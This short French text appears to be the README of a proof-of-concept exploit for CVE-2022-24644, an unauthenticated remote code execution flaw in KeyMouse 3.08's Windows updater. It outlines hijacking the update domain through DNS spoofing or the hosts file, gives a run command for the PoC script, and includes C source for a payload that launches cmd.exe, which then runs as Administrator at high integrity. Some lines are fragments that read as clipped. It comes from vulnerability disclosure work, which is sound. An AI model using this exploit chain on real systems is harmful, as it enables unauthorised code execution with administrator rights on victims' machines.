
Preuve de concept pour CVE-2022-24644, démontrant une exécution de code à distance non authentifiée via usurpation DNS contre le mécanisme de mise à jour de KeyMouse Windows 3.08.
Vulnérabilité d'exécution de code à distance dans la mise à jour non authentifiée de KeyMouse 3.08 (Windows) de ZZ Inc.
Utilisation : python3 cve-2022-24644_poc.py
Détails dans le rapport sur gerr.re.
www.keymouse.com vers notre IP d'attaquant ;
c:\windows\system32\drivers\etc\hosts sur la cible.
proof.c sur l'attaquant, par exemple avec i686-w64-mingw32-gcc proof.c -o proof.exe ;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
En conséquence, proof.exe est exécuté dans le contexte de l'utilisateur Administrateur avec un niveau d'intégrité élevé.